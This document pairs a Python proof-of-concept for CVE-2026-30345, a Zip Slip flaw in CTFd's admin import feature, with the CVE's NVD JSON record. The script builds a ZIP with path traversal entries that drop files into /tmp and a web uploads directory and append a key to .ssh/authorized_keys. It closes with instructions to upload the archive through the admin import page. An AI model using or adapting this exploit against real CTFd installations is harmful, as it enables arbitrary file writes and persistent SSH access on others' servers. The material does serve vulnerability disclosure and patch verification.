CVE-2026-30345

#!/usr/bin/env python3 ''' CVE-2026-30345 PoC - CTFd Zip Slip Vulnerability This PoC generates a malicious ZIP file with path traversal payloads. ''' import zipfile import os import io def create_zip_slip_payload(): """ Create a malicious ZIP file for Zip Slip attack on CTFd Admin import """ # Path traversal payloads - files to be written outside target directory malicious_files = { '../../../tmp/pwned.txt': b'Zip Slip exploitation successful!', '../../../var/www/html/uploads/shell.py': b'#!/usr/bin/env python3\nprint("PWNED")', '../../.ssh/authorized_keys': b'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7...', } zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: for filename, content in malicious_files.items(): # Add file with path traversal in filename zf.writestr(filename, content) print(f'[+] Added malicious entry: {filename}') # Get the ZIP content zip_content = zip_buffer.getvalue() # Save to file with open('ctfd_zip_slip_payload.zip', 'wb') as f: f.write(zip_content) print(f'[+] Created malicious ZIP file: ctfd_zip_slip_payload.zip') print(f'[+] Size: {len(zip_content)} bytes') print('\n[!] Usage: Upload this ZIP file via CTFd Admin > Import functionality') return zip_content def verify_zip_contents(zip_path): """Verify the contents of the generated ZIP file""" with zipfile.ZipFile(zip_path, 'r') as zf: print('\n[+] ZIP file contents:') for info in zf.infolist(): print(f' - {info.filename}') if __name__ == '__main__': print('=' * 60) print('CVE-2026-30345 - CTFd Zip Slip PoC') print('=' * 60) create_zip_slip_payload() verify_zip_contents('ctfd_zip_slip_payload.zip')

{"cve": {"id": "CVE-2026-30345", "sourceIdentifier": "[email protected]", "published": "2026-03-18T17:16:06.703", "lastModified": "2026-04-28T15:16:28.177", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A zip slip vulnerability in the Admin import functionality of CTFd v3.8.1-18-gdb5a18c4 allows attackers to write arbitrary files outside the intended directories via supplying a crafted import."}, {"lang": "es", "value": "Una vulnerabilidad de zip slip en la funcionalidad de importación del Administrador de CTFd v3.8.1-18-gdb5a18c4 permite a los atacantes escribir archivos arbitrarios fuera de los directorios previstos mediante el suministro de una importación manipulada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://blog.ctfd.io/ctfd-3-8-2/", "source": "[email protected]"}, {"url": "https://gist.github.com/syphonetic/2e16a6d1a44e7970c849a17efd0a2270", "source": "[email protected]"}, {"url": "https://github.com/CTFd/CTFd", "source": "[email protected]"}, {"url": "https://github.com/CTFd/CTFd/security/policy", "source": "[email protected]"}, {"url": "https://github.com/syphonetic/CVE-2026-30345", "source": "[email protected]"}]}}